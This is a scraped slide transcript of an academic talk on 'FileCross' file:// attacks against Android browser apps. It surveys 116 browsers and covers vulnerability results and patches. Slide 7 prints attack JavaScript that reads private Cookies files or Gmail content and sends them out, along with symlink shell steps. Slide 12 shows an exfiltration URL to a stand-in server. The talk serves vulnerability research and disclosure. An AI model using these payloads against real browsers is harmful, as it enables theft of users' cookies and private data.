Presentation is loading. Please wait.

Presentation is loading. Please wait.

Analyzing Android Browser Apps for file:// Vulnerabilities Daoyuan Wu and Rocky Chang Oct 13, 2014 The Hong Kong Polytechnic University Information Security.

Published byChase Clee Modified over 9 years ago

Similar presentations

Presentation on theme: "Analyzing Android Browser Apps for file:// Vulnerabilities Daoyuan Wu and Rocky Chang Oct 13, 2014 The Hong Kong Polytechnic University Information Security."— Presentation transcript:

1 Analyzing Android Browser Apps for file:// Vulnerabilities Daoyuan Wu and Rocky Chang Oct 13, 2014 The Hong Kong Polytechnic University Information Security Conference (ISC) 1

2 file:// It is a standard URI scheme used in modern browsers. – Like the well-known http:// and https://. It can be used to browse local files. 2

3 Unfortunately, file:// is an enemy of the mobile security model 3

4 Mobile Security Model: Sandbox-based App Isolation 4 App AApp B app boundary Sensitive files

5 However, file:// requests may break the app data isolation 5 App AApp B app boundary Sensitive files file:// stolen files file:// vulnerabilities

6 An Empirical Study on file:// Vulnerabilities in Android Browser Apps 6 A unified attack model, FileCross Automated testing of Android Browsers Vulnerability results: 64 vulnerable browsers 177 FileCross issues Across different system versions and web engines Further analysis: analyze 10 patches and current file:// practices

7 The FileCross attacks 7 Auto-downloaded to the SD card. Victim Browser Sensitive files Sensitive files Private File Zone Exposed Browsing Interface file:///data/data/pkg/dir/Cookiesfile:///path/attack2.html file:///path/attack4.html file:///path/attack3.html Attack App attack4.html <html><body><h1>attack2</h1><script> var aim = '/data/data/pkg/dir/Cookies'; function sendFile(txt) { … } var xhr = new XMLHttpRequest(); xhr.onreadystatechange = function() { if (xhr.readyState == 4){ sendFile(xhr.responseText); } }; xhr.open('GET', aim); xhr.send(null); <script></body></html> <html><body><h1>attack4</h1><script> var aim = document.URL; function sendFile(txt) { … } setTimeout(function() { var xhr = new XMLHttpRequest(); xhr.onload = function() { sendFile(xhr. responseText); }; xhr.open('GET', aim); xhr.send(null); }, 8000); <script></body></html> The External file:// Browsing Requests <html><body><h1>attack3</h1><script> var aim = 'https://mail.google.com'; function sendFile(txt) { … } var xhr = new XMLHttpRequest(); xhr.onreadystatechange = function() { if (xhr.readyState == 4){ sendFile(xhr.responseText); } }; xhr.open('GET', aim); xhr.send(null); <script></body></html> (A4) (A2) (A3) (A1) attack3.html attack2.html Thread.sleep(4000); rm /path/attack4.html ln –s /.../Cookies /path/attack4.html Cmd 4 Cmd 1 Execute Cmd 4 Execute Cmd 1 Thread.sleep(3000); filepath = findFileInSDcard("Cookies"); if (filepath) readFileFromSDcard(filepath); attack2.html Cookies Compromise SOP on the “host” level attack3.html http(s):// content Compromise SOP on the “protocol” level attack4.html docume nt.URL Cookies Compromise SOP via symbolic links

8 Automated Testing of Android Browsers Test over 100 Android browsers in less than four hours (in multiple devices concurrently) 8

9 The Architecture and Workflow of Our Testing System 9

10 The Major Testing Steps Identifying Exposed Browsing Interfaces (EBI) Propose a lightweight but effective scoring mechanism – Score each component based on our summarized EBI patterns – Select the component with a maximal score as the EBI 10 Can accurately identify the EBIs in 113 browsers out of the tested 116 browsers. * The remaining three are: one is add-on, and the other two do not expose browsing interfaces.

11 The Major Testing Steps Warming up browsers and finding target sensitive files The goal of warming up browsers is to produce some private files. Then our system continues to find target sensitive files from the newly generated private files. 11 “cookie", “password", “bookmark"

12 The Major Testing Steps Automatic attack validation and characterization We cannot rely on naked- eye inspection. Embed five patterns into the attack requests. Web Receiver automatically interprets them. 12 http://ourserver.com/send ?pkg= app pkg name &atk= attack ID &ver= device version &con= contents &kid= a key ID

13 Our Findings 1) Vulnerability results 2) Vulnerability distribution 3) Further analysis 13

14 Overall Vulnerability Results 14  More than half of the browsers tested are vulnerable to the FileCross attacks. (64 vulnerable browsers)  50% of the most popular browsers are also vulnerable (such as Firefox, Baidu, and Maxthon).

15 Representative Vulnerable Browsers 15

16  The file:// vulnerabilities are exploitable in all Android versions.  A2 and A3 most affect Android 4.0.  But Android 4.3 still has over 30 issues of A2 and A3.  Android 4.4 which employs Chrome- based web engine is still exploitable by A2, A3, A4.  A4 has no engine-level patch in 4.4. Vulnerability Distribution: Across Different System Versions 16

17 Vulnerability Distribution: Across Different Web Engines Among 15 browsers that employ custom engines, three are vulnerable. Firefox: libmozglue.so UC Browser HD: libWebCore_UC.so Sogou: libsogouwebcore.so 17 This demonstrates our automated system is valuable to test browsers which may adopt different engines.

18 Patch Analysis We have devoted considerable efforts on reporting our identified vulnerabilities. 18

19 The Current Practice on Exposed Browsing Interfaces 19 A breakdown of exposed browsing interfaces in the 115 tested browsers

20 The Current Practice on file:// Support in Android Browsers 20 65% of the browsers accept external file:// browsing requests. 62% even allow file:// access to the private file zones. – We believe this practice should be forbidden in the mobile environment. 63% support JavaScript execution in file:// URLs.

21 Some Good Practice Examples on file:// Support in Android Browsers 21  file:// is generally not supported in lightweight and dedicated browsers (which spares them from the FileCross attacks).  Several popular browsers already forbid file:// access to private file zones. (Chrome, Dolphin, UC, Yandex browsers)  Three browsers have actively disabled the JavaScript execution in file:// URLS.

22 Q & A My homepage: https://daoyuan14.github.io/ 22

23 Exposed Browsing Interfaces (EBI) Patterns 23

24 Four Types of FileCross Attacks Attack ID Major flaws Sources A1 Auto-download file to SD card [2] A2 SOP bypass for two file:// origins setAllowFileAccessFr omFileURLs A3 SOP bypass for file:// and http(s):// origins setAllowUniversalAc cessFromFileURLs A4 SOP bypass in handling symbolic links [3,4] 24 We are the first to identify them as a unified attack model (i.e., FileCross) and conduct automated testing to analyze their prevalence in Android browsers.

Download ppt "Analyzing Android Browser Apps for file:// Vulnerabilities Daoyuan Wu and Rocky Chang Oct 13, 2014 The Hong Kong Polytechnic University Information Security."

Similar presentations

Nick Feamster CS 6262 Spring 2009

Nick Feamster CS 6262 Spring 2009
The Internet and the Web

The Internet and the Web
Web Programming 1 Darby Chang Web Programming. Cookie 2 Web Programming.

Web Programming 1 Darby Chang Web Programming. Cookie 2 Web Programming.
ForceHTTPS: Protecting High-Security Web Sites from Network Attacks Collin Jackson and Adam Barth.

ForceHTTPS: Protecting High-Security Web Sites from Network Attacks Collin Jackson and Adam Barth.
The OWASP Foundation Web Application Security Host Apps Firewall Host Apps Database Host Web serverApp serverDB server Securing the.

The OWASP Foundation Web Application Security Host Apps Firewall Host Apps Database Host Web serverApp serverDB server Securing the.
JavaScript FaaDoOEngineers.com FaaDoOEngineers.com.

JavaScript FaaDoOEngineers.com FaaDoOEngineers.com.
HCE AND BLE UNIVERSITY TOMORROWS TRANSACTIONS LONDON, 20 TH MARCH 2014.

HCE AND BLE UNIVERSITY TOMORROWS TRANSACTIONS LONDON, 20 TH MARCH 2014.
On the Privacy of Private Browsing Kiavash Satvat, Matt Forshaw, Feng Hao, Ehsan Toreini Newcastle University DPM’13.

On the Privacy of Private Browsing Kiavash Satvat, Matt Forshaw, Feng Hao, Ehsan Toreini Newcastle University DPM’13.
Copyright © 2012 Certification Partners, LLC -- All Rights Reserved Lesson 4: Web Browsing.

Copyright © 2012 Certification Partners, LLC -- All Rights Reserved Lesson 4: Web Browsing.
An Evaluation of the Google Chrome Extension Security Architecture

An Evaluation of the Google Chrome Extension Security Architecture
Lesson 4: Web Browsing.

Lesson 4: Web Browsing.
Extrusion Testing …testing your controls “inside-out” against the threats that actually matter! Panos Dimitriou, MSc InfoSec, CISSP,CISM Director, Managed.

Extrusion Testing …testing your controls “inside-out” against the threats that actually matter! Panos Dimitriou, MSc InfoSec, CISSP,CISM Director, Managed.
Indirect File Leaks in Mobile Applications Daoyuan Wu and Rocky K. C. Chang The Hong Kong Polytechnic University May 21, 2015 1 MoST’15, in conjunction.

Indirect File Leaks in Mobile Applications Daoyuan Wu and Rocky K. C. Chang The Hong Kong Polytechnic University May 21, MoST’15, in conjunction.
Web Security Model CSE 591 – Security and Vulnerability Analysis Spring 2015 Adam Doupé Arizona State University

Web Security Model CSE 591 – Security and Vulnerability Analysis Spring 2015 Adam Doupé Arizona State University
What is adaptive web technology?  There is an increasingly large demand for software systems which are able to operate effectively in dynamic environments.

What is adaptive web technology?  There is an increasingly large demand for software systems which are able to operate effectively in dynamic environments.
Introduction to InfoSec – Recitation 10 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)

Introduction to InfoSec – Recitation 10 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)
Presented by…. Group 2 1. Programming language 2Introduction.

Presented by…. Group 2 1. Programming language 2Introduction.
Computer Concepts 2014 Chapter 7 The Web and E-mail.

Computer Concepts 2014 Chapter 7 The Web and .
Cross-Site Scripting Vulnerabilities Adam Doupé 11/24/2014.

Cross-Site Scripting Vulnerabilities Adam Doupé 11/24/2014.
Copyright © cs-tutorial.com. Introduction to Web Development In 1990 and 1991,Tim Berners-Lee created the World Wide Web at the European Laboratory for.

Copyright © cs-tutorial.com. Introduction to Web Development In 1990 and 1991,Tim Berners-Lee created the World Wide Web at the European Laboratory for.

Similar presentations

Ads by Google